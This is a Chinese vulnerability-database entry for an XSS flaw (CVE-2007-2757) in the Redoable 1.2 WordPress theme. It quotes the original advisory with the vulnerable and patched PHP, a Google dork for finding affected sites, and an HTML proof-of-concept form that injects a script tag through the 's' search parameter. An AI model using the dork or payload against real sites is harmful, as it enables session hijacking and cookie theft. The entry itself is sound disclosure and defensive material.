Redoable 'Index.PHP' 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112970 漏洞类型 跨站脚本
发布时间 2007-05-17 更新时间 2007-08-06
CVE编号 CVE-2007-2757 CNNVD-ID CNNVD-200705-391
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/30050
https://www.securityfocus.com/bid/24037
https://cxsecurity.com/issue/WLB-2007050073
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-391
|漏洞详情
Redoable中存在多个跨站脚本攻击漏洞。远程攻击者可以借助提交到(1)wp-content/themes/redoable/searchloop.php或(2)wp-content/themes/redoable/header.php的s参数,注入任意的web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/24037/info

Redoable is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Redoable 1.2 is vulnerable; other versions may also be affected. 

<!-- Redoable 1.2 - Cross-Site Scripting Vulnerability --------------- Vulnerable Code --------------- header.php (line 6): ... elseif (is_search()) { ?> Search for <?php echo $s } ... searchloop.php (line 24): elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), $s); } ------------ Patched Code ------------ header.php (line 6 FIXED): ... elseif (is_search()) { ?> Search for <?php echo strip_tags($s); } ... searchloop.php (line 24 FIXED): elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), strip_tags($s)); } Vulnerable Variable: s Vulnerable File: wp-content/themes/redoable/searchloop.php and header.php Vulnerable: Redoable 1.2 (other versions should also be vulnerable) Google d0rk: "and Redoable 1.2" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 17th, 2007 !--> <html> <head><title>Redoable 1.2 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>Redoable 1.2 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=%22and+Redoable+1.2%22">"and Redoable 1.2"</a> </font><br><br><br> <center>file <b>index.php</b> - variable <b>s</b> - method <b>get</b></center><br> <form action="http://www.example.com/index.php" method="get"> <input size=75 name="s" value="</title><script>alert(1)</script>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html>
|受影响的产品
deanjrobinson.com Redoable 1.2
|参考资料

来源:BUGTRAQ
名称:20070517RedLevelAdvisory#015-Redoable1.2Cross-SiteScriptingVulnerability(patchincluded)
链接:http://www.securityfocus.com/archive/1/archive/1/468892/100/0/threaded
来源:OSVDB
名称:37041
链接:http://osvdb.org/37041
来源:OSVDB
名称:37040
链接:http://osvdb.org/37040
来源:XF
名称:redoable-header-searchloop-xss(34363)
链接:http://xforce.iss.net/xforce/xfdb/34363
来源:BID
名称:24037
链接:http://www.securityfocus.com/bid/24037
来源:SREASON
名称:2721
链接:http://securityreason.com/securityalert/2721
来源:SECUNIA
名称:25310
链接:http://secunia.com/advisories/25310
来源:MISC
链接:http://redlevel.org/wp-content/uploads/redoable.txt